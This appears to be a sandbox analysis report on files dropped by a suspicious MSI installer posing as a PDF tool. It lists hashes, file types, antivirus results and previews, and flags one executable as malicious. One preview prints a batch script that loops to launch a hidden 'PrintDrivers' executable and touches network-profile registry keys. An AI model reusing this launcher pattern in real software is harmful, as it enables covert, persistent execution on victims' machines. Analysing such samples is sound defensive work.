                                                                  Entropy (8bit):6.219688100806805
                                                                  Encrypted:false
                                                                  SSDEEP:6144:ECh9ewxF4jpDZAGMNcV3gR9AQn8/GCANEIV2PYS/:EX9lA1Nv78Iuhd/
                                                                  MD5:51092B47A18907D361D8FC282877F85C
                                                                  SHA1:E82A4396DFE37E1D4CBFF44EC517540608A88251
                                                                  SHA-256:77F2BDBAEDBAF76873433CBEE63DC643277B435FED72983CE1DD117575685F99
                                                                  SHA-512:52B6C9DCA020098C99757B159E8A0DD2E9D39A1C4915F1088DE53AB40E67B0D5AA46528B78B16FDFC449733979181655008829813CDD411B6F722548CF6515FB
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z..G;..G;..G;..(_..K;..(_..O;..(_...;...S..O;...S.. ;...S..S;..(_..J;..G;...;...R..@;...R..F;...R:.F;...R..F;..RichG;..................PE..d....Zd.........." .....4...........y.......................................`.......D....`..........................................................@...........9.......'...P..x...@...p............................................P..P............................text....2.......4.................. ..`.rdata..nQ...P...R...8..............@..@.data...@>.......$..................@....pdata...9.......:..................@..@.SharedD.....0......................@....rsrc........@......................@..@.reloc..x....P......................@..B................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):870
                                                                  Entropy (8bit):5.106711504896485
                                                                  Encrypted:false
                                                                  SSDEEP:12:/vp14u4pwqZV2/+AgJIhL0EYrvD6Pz3ol7T2HA6tPH6VZ3kxh0fysCkFGT8UWMpr:nep9ZV2tXY7ur3C7T0PaV1k774kI2p
                                                                  MD5:FD3B5847DDB8A31413951C0AA870AB95
                                                                  SHA1:E3E91E3E9FA442CD1937422120DE91DA87973DDB
                                                                  SHA-256:E4F5E16DFE9BBE6D63F266103C35C0035A2D4014F516420190B7CFAFB02B08AD
                                                                  SHA-512:5D8599F7D6F0824AB30118F5680BF89D28C1E7E9DE4ED61AF9074CB9D339619D59DAB8E5818DC93DCF5B27AD9E8A863C5D082F8F829AA8C4A026EC5DA2454096
                                                                  Malicious:false
                                                                  Preview:::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\PrintDrivers /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..:com ..for %%A in (C:\Games\PrintDrivers.cmd) do if %%~zA gtr 7 start C:\Games\PrintDrivers.exe /HideWindow C:\Games\PrintDrivers.cmd..timeout /t 20..goto com
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {3A995974-27F0-4693-BBBA-215A8CDC3544}, Number of Words: 2, Subject: Your Application, Author: Your Company, Name of Creating Application: Advanced Installer 17.3 build 2e9bb285, Template: ;1033, Comments: This installer database contains the logic and data required to install Your Application., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                  Category:dropped
                                                                  Size (bytes):976384
                                                                  Entropy (8bit):6.553744622059538
                                                                  Encrypted:false
                                                                  SSDEEP:24576:m7bYOINVUuD6yS1wGbXpsHzCsa1fLK/hVrA:m7bYO+UuD6ySaGbX+H9at+hVrA
                                                                  MD5:AA6C669C39D9BE8B6289F10DAAFBA6F3
                                                                  SHA1:A7A73BD177B58847F42DAE48DA443E33482DD337
                                                                  SHA-256:C5BF02C8C23DBF8798D87FAD91EA44A3153FC1026248BD931F360BA0D6C5989E
                                                                  SHA-512:1A7A272E63BEDA9B887158E8187C5D8A2351B21FDF912951555CF0DB9F693A4C92DEC4628C9FFE2E535D7FB869E03C12EB236DC8FD21E2118ED1BF193A010E93
                                                                  Malicious:false
                                                                  Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<.............../...#........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...-.......3...0...@...1...2...5...4...=...6...7...8...9...:...;.......e...>...?...D...A...B...C.......E...^...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]......._...`...a...b...c...d...f...y...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...z.......
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):488392
                                                                  Entropy (8bit):6.487016089879727
                                                                  Encrypted:false
                                                                  SSDEEP:12288:2z3lKqNpYmBzR4vyj/DiSOzvL/fye6VOTC3aevaMo4YXbGggjlM4:2z3l96FgpM4
                                                                  MD5:C2666428A2947B6FFC1981DD7D0373A9
                                                                  SHA1:9FD441B50427B6265AFC6AF9C7B3C398A3DDA82D
                                                                  SHA-256:2C765BBACCA51331DBF3D04644BDA55AB9A3E5E3716A2B71FD018FD2ED1346BC
                                                                  SHA-512:09093E66A810EB05467BE7521795A4BE5714DD150E4EA0930AD0227C391161F873B5E0B12615964097D7E83D31506EE3D038424D08E74AD88C80A3798EEC45D7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n..g*.{4*.{4*.{4..x5/.{4..~5..{4...5 .{4x.~5..{4x..5$.{4x.x5#.{4..z5#.{4*.z4S.{4..r5+.{4..{5+.{4...4+.{4*..4+.{4..y5+.{4Rich*.{4........PE..d......d.........." .................2.................................................... .....................................................d............0..@G...L...'..........@{..p............................{..8............................................text... ........................... ..`.rdata...!......."..................@..@.data....&..........................@....pdata..@G...0...H..................@..@_RDATA...............:..............@..@.rsrc................<..............@..@.reloc...............B..............@..B................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.150184159866505
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKRk3/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:5M/iDnLNkPlE99SNxAhUe/3
                                                                  MD5:B42695CFADADE7807924183BFD2F1F38
                                                                  SHA1:1963FA81687705C862FA6E2461539EFE802815F3
                                                                  SHA-256:23FBE5DDA55DADA0A0D766B33B8DE5CE739BF87824DD8D13A627102B760F6E84
                                                                  SHA-512:C26FD2328AA776F348919DE24ED76B667C22499814452243BA6B6C880E576B43B37AF78174C12B5E58885541B1ED3792C7FAA979E964A138515303E379EC52CC
                                                                  Malicious:false
                                                                  Preview:p...... ...............(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PNG image data, 5208 x 8664, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):3246796
                                                                  Entropy (8bit):7.708096217218525
                                                                  Encrypted:false
                                                                  SSDEEP:98304:3+DIr/w96Z/G/Wrv2R8IQUbhBninNjcOE8:NLw90hrvItehcQ
                                                                  MD5:CCE9725B6A855F4E77C30F9717E7747E
                                                                  SHA1:CC8270DB0C62B3F383B1D770A9861F5DFFA7A962
                                                                  SHA-256:2987BB8D3614291F8EF10E8CCABD9E95696E7EFDEF48CD557824B0C39F928B09
                                                                  SHA-512:066177CC2AC7A7A819F50EEB594886927A4870645B2B0F36B38FAC88EB1D53DC80F4B37CE7ECE55B859D420A5AD8EF0D8A090CACC6690419EA476D7EE854CE06
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {92C98B75-E1D1-429B-9815-3BF9C1AD8A52}, Number of Words: 10, Subject: Pdf, Author: Pdf, Name of Creating Application: Pdf (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Pdf. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Oct 9 11:42:36 2024, Last Saved Time/Date: Wed Oct 9 11:42:36 2024, Last Printed: Wed Oct 9 11:42:36 2024, Number of Pages: 450
                                                                  Category:dropped
                                                                  Size (bytes):7064064
                                                                  Entropy (8bit):7.792563695599767
                                                                  Encrypted:false
                                                                  SSDEEP:196608:QK4NkomkEmjut8DMcj4IWKPDNwmtoOCvHLNkAIdc:QKfkEmjuSMcxWKLNwunA5
                                                                  MD5:E21B2080C98BEB0F04307A5A25630E23
                                                                  SHA1:8FC24AD51E8D61324FE8DE1BE667862E9238CBBB
                                                                  SHA-256:0DBEAAB616C483B81D9E9ED8DDA14A3A8F3B024130F8FAB840E7B9F3A7B1787E
                                                                  SHA-512:3706FDE6569BCCB39E2C58E86C60050C73BCDBE5C7EB05849CED33C75B5A1C3B080746C2E27420C6FFFCD3497E1B1B6AB87E1B2D371A80FA3AE27851A64CFBEA
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1021792
                                                                  Entropy (8bit):6.608380087035959
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                  MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                  SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                  SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                  SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):434274
                                                                  Entropy (8bit):6.545426444976944
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4l7GrJZsRtP01Ab+biU50unhTzTQWNy7kokGqzTD:47UJaR10A+biU50unhFNyIGqfD
                                                                  MD5:53A1BEBBDEC2C5D7B6A3E9DBC34280EC
                                                                  SHA1:19435D83EC5088CE0829A0F9D6975AF3B0682095
                                                                  SHA-256:889FA98F3291DC522023B15D37BCDEBCA825620DC9D460BE48DE4F0F09ED7B37
                                                                  SHA-512:44B41DC371D16144A01BD54782C4D0F1B3EB284D7BE3420EEF522CE7B611FE463B360EF161B35020C5DFA70CDEDC253CEC62597C868A877463D76DA2D78778EF
                                                                  Malicious:false
                                                                  Preview:...@IXOS.@.....@..KY.@.....@.....@.....@.....@.....@......&.{47512254-C195-428F-AD42-A0F24652B3FD}..Pdf..rs8dpaIe6D.msi.@.....@.....@.....@........&.{92C98B75-E1D1-429B-9815-3BF9C1AD8A52}.....@.....@.....@.....@.......@.....@.....@.......@......Pdf......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B1A2B65E-F7DC-4079-8165-372C88BB13EF}'.C:\Users\user\AppData\Roaming\Pdf\Pdf\.@.......@.....@.....@......&.{8438ED6F-3E17-4118-8799-F8A99D851E04}..01:\Software\Pdf\Pdf\Version.@.......@.....@.....@......&.{0BF8C5FE-822D-49A6-9F4D-84F19DDB4723}..01:\Software\Microsoft\.@.......@.....@.....@......&.{B93ED057-8995-473C-867B-17ED6B548B26}".01:\Software\Microsoft\Windows NT\.@.......@.....@.....@......&.{E14EB6B7-011A-4A35-BFED-B669968BC133}1.01:\Software\Microsoft\Windows NT\CurrentVersion\.@.......@.....@.....@......&.{E6D432F9-EEA9-4218-B20A-1C3CD0BBE2A9}=.01:\So
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):428248
                                                                  Entropy (8bit):6.538923971741108
                                                                  Encrypted:false
                                                                  SSDEEP:12288:il7GrJZsRtP01Ab+biU50unhTzTQWNy7kokGqzT:27UJaR10A+biU50unhFNyIGqf
                                                                  MD5:432827EC55428786A447B3D848D963B7
                                                                  SHA1:029901586604F3AB1B0BD18868469A96DB0EF470
                                                                  SHA-256:5A4E76F840FE7D9872164C6C3CE85F4DD0405E661C04638E0B8A91157398BBF0
                                                                  SHA-512:EFE03D3446B07180A12D8CD8D0B6D25DD6DA5B445C6D61125B0E81C848A98B78F502A6C7C8C7DFC87B3D5BEAFDEA100AC6580E0D28F2CFB99EDA90A19449C226
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.1634397181526743
                                                                  Encrypted:false
                                                                  SSDEEP:12:JSbX72FjDAGiLIlHVRpZh/7777777777777777777777777vDHFA9it/l0i8Q:JtQI5tjiF
                                                                  MD5:0A3DBCC97503559DCAAA71860E43EE06
                                                                  SHA1:1708435477A67F4AB8006850C22DB15A368BD286
                                                                  SHA-256:57FFD9BE5391A9471ED859E18C231D15E9B89520B8F89239B9D3BD637B03A0B5
                                                                  SHA-512:ED5A39A3990F295DA570935CE4D414D08B96E7865C1CEA264F67787F80064CFC3A634CE29295FCB205E027180DCDD61E700F0272B8ECC0F7CAA622D248712DBC
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.5035352720767863
                                                                  Encrypted:false
                                                                  SSDEEP:48:G8PhKuRc06WXJ0FT5F5qF8+MSCWAECiCyro3qMSCcT7:ZhK13FTgF+1ECZ
                                                                  MD5:F143DFEC72D0FE796DFF2E3012D18F50
                                                                  SHA1:38730A7756D3BAC7380FEB9D6A861317722E4DCA
                                                                  SHA-256:707F704494C782BA1D7B1D5D57CCB0636669F0BA47966AD13A8FE176922C0856
                                                                  SHA-512:6EBB12C0D3434398786C9F24F3186FFF3B8FE9FD7479FE6625D9A854807CCA09565626E1447445F97CA95740B68DF58442C9B6E0464F40C3A1D06115C528854C
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):432221
                                                                  Entropy (8bit):5.37516889400589
                                                                  Encrypted:false
                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau/:zTtbmkExhMJCIpErO
                                                                  MD5:04063B6531BB7CBFA9E7D8FF4FFA5005
                                                                  SHA1:79232FA61D07141E4362BDE76239999B2D175645
                                                                  SHA-256:BFB0B034C82CA6F18FF07A7BD1A325D1D02A9306BCA1C0163027CF52C2F8F940
                                                                  SHA-512:580B9A84597F18A3A3A460F456B52BC1BA1EF1D5F3926A52CCBF27E5F31B53618A0A24A60E0A30D62C4BBB8186B31434F921F2CBB97E5F2729B55438852C397C
                                                                  Malicious:false
                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):1.2102929820892037
                                                                  Encrypted:false
                                                                  SSDEEP:48:snCu7I+CFXJpT5X5qF8+MSCWAECiCyro3qMSCcT7:SC1RTqF+1ECZ
                                                                  MD5:B12429732AE359960571FA86A23280CE
                                                                  SHA1:C420AA919A2B5EA163A2BC5112135FCB2978B65A
                                                                  SHA-256:712BBFBCA15B5B5B79EDAE5776DBEFD05A87D548A2F4F4A2ED5876C3742896E9
                                                                  SHA-512:64722D69AE17E045A1865DE64B654D449962F100B2441C48F3958D8B16F4723BA77FB14AC37AB24EC73E2EFCC50B0488EBCC1B1E80E3B571BB2CF94C061FBCE3
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.5035352720767863
                                                                  Encrypted:false
                                                                  SSDEEP:48:G8PhKuRc06WXJ0FT5F5qF8+MSCWAECiCyro3qMSCcT7:ZhK13FTgF+1ECZ
                                                                  MD5:F143DFEC72D0FE796DFF2E3012D18F50
                                                                  SHA1:38730A7756D3BAC7380FEB9D6A861317722E4DCA
                                                                  SHA-256:707F704494C782BA1D7B1D5D57CCB0636669F0BA47966AD13A8FE176922C0856
                                                                  SHA-512:6EBB12C0D3434398786C9F24F3186FFF3B8FE9FD7479FE6625D9A854807CCA09565626E1447445F97CA95740B68DF58442C9B6E0464F40C3A1D06115C528854C
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.5035352720767863
                                                                  Encrypted:false
                                                                  SSDEEP:48:G8PhKuRc06WXJ0FT5F5qF8+MSCWAECiCyro3qMSCcT7:ZhK13FTgF+1ECZ
                                                                  MD5:F143DFEC72D0FE796DFF2E3012D18F50
                                                                  SHA1:38730A7756D3BAC7380FEB9D6A861317722E4DCA
                                                                  SHA-256:707F704494C782BA1D7B1D5D57CCB0636669F0BA47966AD13A8FE176922C0856
                                                                  SHA-512:6EBB12C0D3434398786C9F24F3186FFF3B8FE9FD7479FE6625D9A854807CCA09565626E1447445F97CA95740B68DF58442C9B6E0464F40C3A1D06115C528854C
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):0.07120418472562191
                                                                  Encrypted:false
                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOpKDijZtgVky6lit/:2F0i8n0itFzDHFAQZit/
                                                                  MD5:45A16D0491544E8E5EB3944F31357582
                                                                  SHA1:2D3B70F4CF19401ECD3D795679D39FDA451A42D6
                                                                  SHA-256:DA95D0EE70F7F51C701220EB5E64376A24B69D7118C9A00BD32437230CC80CF9
                                                                  SHA-512:FE6E5B78D79E56625096E4192815F6C0FA9BB06182F693CA3962D15A98BB2DB0ABD198BA4EAD5B77C6A330DB1DA528B2049C4372BE4F7B5F0679485E3E71EFBC
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):73728
                                                                  Entropy (8bit):0.11431084501225285
                                                                  Encrypted:false
                                                                  SSDEEP:24:6vTxkrwipVkrakrwipVkrSAEVkryjCyrV2BwGlitC+XqaN:6vTeMSCpMSCWAECiCyro3+C2q+
                                                                  MD5:651FD89067FF840C5F18D7E82589A88C
                                                                  SHA1:9ACEC940C95C0AF04CB6AAD7BA32A66A2BBEC795
                                                                  SHA-256:05E61A653F1CFEF2021659A59A01377622502ADB4D459864FE73BBDA523E038C
